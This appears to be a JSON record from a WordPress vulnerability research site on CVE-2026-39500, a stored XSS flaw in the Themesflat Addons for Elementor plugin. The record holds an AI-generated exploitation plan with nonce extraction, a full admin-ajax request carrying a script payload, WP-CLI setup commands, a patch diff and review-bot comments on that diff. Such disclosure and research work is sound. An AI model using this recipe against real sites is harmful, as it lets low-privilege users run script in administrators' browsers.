[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvTiOD0bPTvQkltFQfkOBk0d5b6oJE0Fo4JpgqNCNSzg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-39500","themesflat-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-7","themesflat-addons-for-elementor \u003C= 2.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting","The themesflat-addons-for-elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","themesflat-addons-for-elementor",null,"\u003C=2.3.2","2.3.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-23 00:00:00","2026-04-15 21:11:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa1da201f-47e3-4f39-9c8b-cd842e8f7ca5?source=api-prod",24,[22,23,24],"readme.txt","themesflat-addons-for-elementor.php","widgets\u002Fwidget-accordion.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-39500\n\n## 1. Vulnerability Summary\nThe **Themesflat Addons For Elementor** plugin (up to v2.3.2) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin registers various Elementor widgets (e.g., `tfaccordion`, `tf-imagebox`) but fails to sanitize or escape user-provided settings\u002Fparameters in the `render()` method of these widgets. \n\nAn attacker with **Contributor-level** permissions (who can create\u002Fedit posts using Elementor) can inject arbitrary JavaScript into a widget's control fields (like titles, content, or links). When the page is rendered for any visitor (including administrators), the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: `wp-admin\u002Fadmin-ajax.php` (via Elementor's `save_builder_data` action).\n*   **Vulnerable Action**: `elementor_ajax`.\n*   **Vulnerable Parameter**: The `settings` object within the `_elementor_data` post meta, specifically fields like `list_title` or `list_content` in the `tfaccordion` widget.\n*   **Authentication**: Contributor+ (Authenticated).\n*   **Preconditions**: \n    1.  Elementor plugin must be active.\n    2.  
Attacker must have credentials for a user with the `edit_posts` capability.\n\n## 3. Code Flow\n1.  **Registration**: The plugin registers widgets in `ThemesFlat_Addon_For_Elementor_Free::init_widgets` (hooked to `elementor\u002Fwidgets\u002Fregister`).\n2.  **Widget Definition**: In `widgets\u002Fwidget-accordion.php`, the class `TFAccordion_Widget_Free` defines controls via `register_controls()`.\n    *   A repeater field is created: `$repeater = new \\Elementor\\Repeater();`.\n    *   The `list_title` control is added: `$repeater->add_control( 'list_title', [...] );`.\n3.  **Storage**: When a Contributor saves an Elementor page, the data is sent to `admin-ajax.php` and stored in the database as a JSON-encoded string in the `_elementor_data` post meta key.\n4.  **Sink (Rendering)**: The `render()` method (found in `widgets\u002Fwidget-accordion.php`, though truncated in source) retrieves these settings via `$this->get_settings_for_display()`. It then iterates through the repeater items and outputs them.\n    *   **Vulnerable Pattern**: `echo $item['list_title'];` instead of `echo esc_html($item['list_title']);`.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own nonce system for AJAX saves. To obtain a valid nonce as a Contributor:\n\n1.  **Create a Post**: Create a standard post\u002Fpage first to get a valid `post_id`.\n2.  **Open Editor**: Navigate the browser to the Elementor editor URL for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3.  **Extract Nonce**: The nonce required for `elementor_ajax` is stored in the global JavaScript object `elementorCommonConfig`.\n4.  **JavaScript Extraction**:\n    *   Variable: `window.elementorCommonConfig.ajax.nonce`\n    *   Alternative: `window.elementorConfig.ajax.nonce` (depending on Elementor version).\n\n## 5. Exploitation Strategy\n### Step 1: Authentication & Setup\n1.  Login as a Contributor user.\n2.  
Identify a target post ID or create a new one.\n\n### Step 2: Extract Elementor Nonce\nUse the `browser_navigate` and `browser_eval` tools:\n*   Navigate to: `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fpost.php?post=[ID]&action=elementor`\n*   Execute: `browser_eval(\"window.elementorCommonConfig.ajax.nonce\")`\n\n### Step 3: Inject Stored XSS\nSend an HTTP POST request to `admin-ajax.php` to update the post's builder data.\n\n*   **URL**: `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n*   **Parameters**:\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`: A JSON object containing the save command:\n        ```json\n        {\n          \"save_builder_data\": {\n            \"action\": \"save_builder_data\",\n            \"data\": {\n              \"status\": \"publish\",\n              \"elements\": [\n                {\n                  \"id\": \"exploit-id\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"tfaccordion\",\n                  \"settings\": {\n                    \"list\": [\n                      {\n                        \"list_title\": \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\n                        \"list_content\": \"Vulnerable Content\",\n                        \"set_active\": \"active\"\n                      }\n                    ]\n                  }\n                }\n              ]\n            }\n          }\n        }\n        ```\n    *   `post_id`: `[POST_ID]`\n\n### Step 4: Trigger Execution\nNavigate to the frontend URL of the post (`\u002F?p=[POST_ID]`). The script in `list_title` will execute.\n\n## 6. Test Data Setup\n1.  **Plugin Version**: Ensure `themesflat-addons-for-elementor` version is `2.3.2`.\n2.  **Contributor User**:\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. 
 **Target Post**:\n    *   `wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_author=[ATTACKER_ID]`\n4.  **Note**: Elementor must have \"Post\" enabled in its settings (default) to edit this post.\n\n## 7. Expected Results\n*   The `admin-ajax.php` request should return a `200 OK` with a JSON response containing `\"success\":true`.\n*   Upon visiting the post frontend, an alert box showing the document domain should appear.\n*   The HTML source of the page will contain the raw payload: `\u003Cdiv class=\"title\">...\u003Cscript>alert(document.domain)\u003C\u002Fscript>...\u003C\u002Fdiv>`.\n\n## 8. Verification Steps\n1.  **Check Database**: Use WP-CLI to inspect the stored meta:\n    *   `wp post meta get [POST_ID] _elementor_data`\n    *   Verify the JSON contains the `\u003Cscript>` payload.\n2.  **Verify Frontend Output**:\n    *   `curl -s \"http:\u002F\u002F[TARGET]\u002F?p=[POST_ID]\" | grep \"\u003Cscript>alert\"`\n    *   Confirm the output is NOT escaped (e.g., NOT `&lt;script&gt;`).\n\n## 9. Alternative Approaches\n*   **Widget Variation**: If `tfaccordion` is patched or unavailable, target the `tf-imagebox` widget (Image Box).\n    *   Vulnerable field in `tf-imagebox`: `title_text`.\n    *   `widgetType`: `tf-imagebox`.\n*   **Bypass Nonce**: If the Elementor AJAX nonce is difficult to retrieve, a Contributor can try to inject the payload via the standard `save_post` hook by sending the `_elementor_data` parameter in a regular post update request (`post.php`), although Elementor often requires its own editor hooks to update this specific meta key.","The Themesflat Addons For Elementor plugin (up to v2.3.2) is vulnerable to Authenticated Stored Cross-Site Scripting (XSS). 
This occurs because the plugin's Elementor widgets, such as the Accordion and Image Box, fail to sanitize and escape user-provided settings like titles and content in their render methods, allowing contributors to execute scripts in other users' browsers.","\u002F\u002F widgets\u002Fwidget-accordion.php\n\n\u002F\u002F Control registration\n$repeater->add_control( 'list_title', [\n    'label' => esc_html__( 'Nav text', 'themesflat-addons-for-elementor' ),\n    'type' => \\Elementor\\Controls_Manager::TEXT,\n    'default' => esc_html__( 'Accordion Title', 'themesflat-addons-for-elementor' ),\n    'placeholder' => esc_html__( 'Type your title here', 'themesflat-addons-for-elementor' ),\n] );\n\n---\n\n\u002F\u002F widgets\u002Fwidget-accordion.php (inferred sink in render method)\nprotected function render() {\n    $settings = $this->get_settings_for_display();\n    if ( $settings['list'] ) {\n        foreach ( $settings['list'] as $index => $item ) {\n            \u002F\u002F ... (truncated)\n            echo $item['list_title']; \u002F\u002F Vulnerable: Output not escaped\n        }\n    }\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.2\u002Fthemesflat-addons-for-elementor.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.3\u002Fthemesflat-addons-for-elementor.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.2\u002Fthemesflat-addons-for-elementor.php\t2025-12-18 08:20:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.3\u002Fthemesflat-addons-for-elementor.php\t2026-03-13 02:38:20.000000000 +0000\n@@ -4,13 +4,13 @@\n Description: The theme's components\n Author: Themesflat\n Author URI: 
http:\u002F\u002Fthemesflat-addons.com\u002F\n-Version: 2.3.2\n+Version: 2.3.3\n Text Domain: themesflat-addons-for-elementor\n Domain Path: \u002Flanguages\n \n-WC tested up to: 10.4\n-Elementor tested up to: 3.33\n-Elementor Pro tested up to: 3.33\n+WC tested up to: 10.6\n+Elementor tested up to: 3.35\n+Elementor Pro tested up to: 3.35\n \n License: GPLv2 or later\n License URI: https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\n@@ -1854,11 +1741,15 @@\n         }\n \n         public function get_posts_by_conditions( $post_type, $option ) {\n-            global $wpdb;\n-            global $post;\n+            global $wpdb, $post;\n \n-            $post_type = $post_type ? esc_sql( $post_type ) : esc_sql( $post->post_type );\n+            \u002F\u002F fallback post_type\n+            $post_type = $post_type ? sanitize_key( $post_type ) : ( isset( $post->post_type ) ? sanitize_key( $post->post_type ) : '' );\n+            if ( empty( $post_type ) ) {\n+                return [];\n+            }\n \n+            \u002F\u002F cache\n             if ( is_array( self::$current_page_data ) && isset( self::$current_page_data[ $post_type ] ) ) {\n                 return apply_filters( 'tfhf_get_display_posts_by_conditions', self::$current_page_data[ $post_type ], $post_type );\n             }\n@@ -1867,99 +1758,130 @@\n \n             self::$current_page_data[ $post_type ] = array();\n \n-            $option['current_post_id'] = self::$current_page_data['ID'];\n+            \u002F\u002F meta option post (giữ nguyên logic cũ)\n+            $option['current_post_id'] = isset( self::$current_page_data['ID'] ) ? 
self::$current_page_data['ID'] : false;\n             $meta_header               = self::get_meta_option_post( $post_type, $option );\n \n             if ( false === $meta_header ) {\n-\n-                $current_post_type = esc_sql( get_post_type() );\n+                $current_post_type = sanitize_key( get_post_type() );","The exploit is carried out by an authenticated user with Contributor-level permissions (the `edit_posts` capability). First, the attacker logs into the WordPress dashboard and identifies a post they can edit with Elementor. They then extract a valid Elementor AJAX nonce, typically found in the global `elementorCommonConfig` JavaScript object within the editor. Using this nonce, the attacker sends an authenticated `POST` request to `wp-admin\u002Fadmin-ajax.php` with the action `elementor_ajax` and the `save_builder_data` command. The payload is placed inside the `settings` object of a widget (e.g., `tfaccordion` or `tf-imagebox`), specifically in fields like `list_title`. When any user, including an administrator, views the published post, the injected script executes in their browser context.","gemini-3-flash-preview","2026-04-17 23:35:31","2026-04-17 23:35:58",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemesflat-addons-for-elementor\u002Ftags\u002F2.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthemesflat-addons-for-elementor.2.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemesflat-addons-for-elementor\u002Ftags\u002F2.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthemesflat-addons-for-elementor.2.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemesflat-addons-for-elementor\u002Ftags"]
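Review bot: the `@@ -1854,11 +1741,15 @@` hunk in themesflat-addons-for-elementor.php hardens the `$post_type` handling in `get_posts_by_conditions()` (`esc_sql()` replaced by `sanitize_key()`, plus an `isset()` guard and an early `return []` for an empty post type), but it does not touch the output-escaping defect in `widgets/widget-accordion.php` that the record names as the XSS sink, so this excerpt alone does not demonstrate the CVE-2026-39500 fix; the accordion `render()` change should be reviewed separately. The shift in line numbers (1854 in 2.3.2 to 1741 in 2.3.3) also shows roughly a hundred lines removed earlier in the file that are not part of this excerpt. One behavioural note for callers: previously an empty `$post_type` fell through to a query, now the function returns an empty array, so any caller that distinguished "no posts" from "no post type" should be checked.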
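Review bot: in the `@@ -1867,99 +1758,130 @@` hunk, the added comment `// meta option post (giữ nguyên logic cũ)` is Vietnamese ("keep the old logic") in an otherwise English-commented file; suggest `// meta option post (unchanged logic)`. The `isset( self::$current_page_data['ID'] ) ? ... : false` guard removes an undefined-index notice, but `false` is now passed through `$option['current_post_id']` into `get_meta_option_post()`, whose handling of a `false` post ID is not visible in this diff and should be confirmed. The `sanitize_key( get_post_type() )` replacement is consistent with the earlier hunk; note that `get_post_type()` can return `false` outside the loop, which `sanitize_key()` turns into an empty string, so the subsequent code must tolerate `''` for `$current_post_type`.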